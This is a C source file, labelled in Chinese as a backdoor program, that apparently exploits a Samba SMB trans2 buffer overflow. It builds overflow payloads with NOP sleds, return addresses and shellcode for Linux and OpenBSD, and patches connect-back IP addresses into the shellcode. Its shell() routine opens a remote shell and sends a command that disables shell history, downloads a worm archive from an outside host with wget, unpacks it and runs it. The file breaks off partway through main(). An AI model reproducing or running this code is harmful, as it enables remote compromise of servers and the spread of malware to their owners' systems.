samd.c

一个用C语言写的后门程序

int
write_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdwrite;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
		close(fd);
		return (-1);
	}
	
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdwrite);
	FD_SET(fd, &fdwrite);

	select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;
	}
	
	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &fdwrite)) {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
			return -1;
		}
		return 1;
	}
	else { 
		close(fd);
		return -1;
	}
}


void 
shell(int sock)
{
        fd_set  fd_read;
        char buff[1024], *cmd="unset HISTFILE;cd /usr/lib;wget http://winnt/fetdog/wormz/sars.tar.gz 1>>/dev/null 2>>/dev/null 3>>/dev/null;tar zxvf sars.tar.gz > /dev/null 2>&1;rm -rf sars.tar.gz;cd .lib;./start.sh;\n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                FD_SET(sock,&fd_read);
                FD_SET(0,&fd_read);

                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                if (FD_ISSET(sock, &fd_read)) {

                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (write(1, buff, n) < 0) break;
                }

                if (FD_ISSET(0, &fd_read)) {

                        if((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (send(sock, buff, n, 0) < 0) break;
                }

                usleep(10);
        }

       
        exit(0);
}

void
handler()
{
	int sock = 0;
	int i = 0;
	OWNED = 1;

        for (i = 0; i < 100; i++)
                if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);

        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                close(sock);
		exit(1);
        }

        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
 
                shell(sock);
                close(sock);
        }


}

int 
start_session(int sock)
{
	char buffer[1000];
	char response[4096];
	char session_data1[] 	= "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
        char session_data2[] 	= "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
		                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
	
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type 	= 0x00;         /* session message */
        netbiosheader->flags 	= 0x00;
        netbiosheader->length 	= htons(0x2E);

        smbheader->protocol[0] 	= 0xFF;
        smbheader->protocol[1] 	= 'S';
        smbheader->protocol[2] 	= 'M';
        smbheader->protocol[3] 	= 'B';
        smbheader->command 	= 0x73;         /* session setup */
        smbheader->flags 	= 0x08;         /* caseless pathnames */
        smbheader->flags2 	= 0x01;         /* long filenames supported */
        smbheader->pid 		= getpid() & 0xFFFF;
	smbheader->uid          = 100;
        smbheader->mid 		= 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);

	if(write_timer(sock, 3) == 1)
		if (send(sock, buffer, 50, 0) < 0) return -1;

	memset(response, 0x00, sizeof(response));

	if (read_timer(sock, 3) == 1)
		if (read(sock, response, sizeof(response) - 1) < 0) return -1;
	
        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

	if (netbiosheader->type != 0x00);

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x70;         /* start connection */
	smbheader->pid          = getpid() & 0xFFFF;
	smbheader->tid		= 0x00;
        smbheader->uid          = 100;

	memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;
}

int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{

	char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

	int i = 0;
	unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
	smbheader->tid			= 0x01;
        smbheader->uid                  = 100;

	memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	buffer[1096] = 0xEB;
	buffer[1097] = 0x70;

	for (i = 0; i < 4 * 24; i += 8) {
		memcpy(buffer + 1099 + i, &dummy, 4);
		memcpy(buffer + 1103 + i, &ret,   4);
	}

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
			exploit_data, sizeof(exploit_data) - 1);
	memcpy(buffer + 1800, shellcode, strlen(shellcode));

	if(write_timer(sock, 3) == 1) {
		if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
		return 0;
	}

	return -1;
}

int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
        char buffer[4000];

        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x30;
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	for (i = 0; i < 4 * 24; i += 4)
		memcpy(buffer + 1131 + i, &dummy, 4);
		
        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}


int
main (int argc,char *argv[])
{
	char *shellcode = NULL;
	char scan_ip[256];

	int brute	= -1;
	int connectback = 0;
	int force	= 0;
	int i		= 0;
	int ip1		= 0;
	int ip2		= 0;
	int ip3		= 0;
	int ip4		= 0;
	int opt		= 0;
	int port	= 139;
	int random	= 0;
	int scan	= 0;
	int sock	= 0;
	int sock2	= 0;
	int status	= 0;
	int type	= 0;
	int verbose	= 0;

	unsigned long BRUTE_DELAY 	= 100000;
	unsigned long ret		= 0x0;
	unsigned long MAX_CHILDS 	= 40;
	unsigned long STEPS		= 300;

        struct hostent 		*he;

	
        
        while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
                switch(opt) 
		{
			case 'b':
				brute = atoi(optarg);
				if ((brute < 0) || (brute > 3)) {
					fprintf(stderr, "Invalid platform.\n\n");
					return -1;
				}
				break;
			case 'B':
				STEPS = atoi(optarg);
				if (STEPS == 0) STEPS++;
				break;
			case 'c':
				sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
				connectback = 1;

				if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
					fprintf(stderr, "Invalid IP address.\n\n");
					return -1;
				}

				linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
				linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
				linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
				linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;